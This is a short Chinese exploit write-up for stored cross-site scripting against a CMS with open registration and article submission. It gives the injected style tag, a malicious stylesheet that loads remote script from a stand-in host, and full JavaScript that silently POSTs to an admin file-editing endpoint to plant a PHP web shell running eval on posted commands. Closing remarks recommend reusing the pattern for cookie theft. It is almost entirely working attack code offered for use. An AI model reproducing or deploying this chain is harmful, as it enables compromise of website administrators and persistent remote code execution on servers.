利用条件:开启注册&&开启投稿
方法 :注册会员 -> 发表文章:内容输入
<style>@import´http://xxx.com/xss.css´;</style> |
|
|
|
xss.css内容: |
|
body{background-image:url(´javascript:document.write(“<script src=http://xxx.com/logo.jpg></script>”)´)} |
|
|
|
logo.jpg内容: |
|
|
|
var request = false; |
|
if(window.XMLHttpRequest) { |
|
request = new XMLHttpRequest(); |
|
if(request.overrideMimeType) { |
|
request.overrideMimeType(´text/xml´); |
|
} |
|
} else if(window.ActiveXObject) { |
|
var versions = [´Microsoft.XMLHTTP´, ´MSXML.XMLHTTP´, ´Microsoft.XMLHTTP´, ´Msxml2.XMLHTTP.7.0´,´Msxml2.XMLHTTP.6.0´,´Msxml2.XMLHTTP.5.0´, ´Msxml2.XMLHTTP.4.0´, ´MSXML2.XMLHTTP.3.0´, ´MSXML2.XMLHTTP´]; |
|
for(var i=0; i<versions.length; i++) { |
|
try { |
|
request = new ActiveXObject(versions[i]); |
|
} catch(e) {} |
|
} |
|
} |
|
xmlhttp=request; |
|
function getFolder( url ){ |
|
obj = url.split(´/´) |
|
return obj[obj.length-2] |
|
} |
|
oUrl = top.location.href; |
|
u = getFolder(oUrl); |
|
add_admin(); |
|
function add_admin(){ |
|
var url= “/”+u+”/sys_sql_query.php”; |
|
var params =”fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=%3C%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++”; |
|
xmlhttp.open(“POST”, url, true); |
|
xmlhttp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”); |
|
xmlhttp.setRequestHeader(“Content-length”, params.length); |
|
xmlhttp.setRequestHeader(“Connection”, “Keep-Alive”); |
|
xmlhttp.send(params); |
|
} |
1 |
记住这个js脚本吧,get post cookies都可以用这种模式。 |
2 |
这个ajax写得很完善.(新浪蠕虫依赖jquery直接使用ajax). |
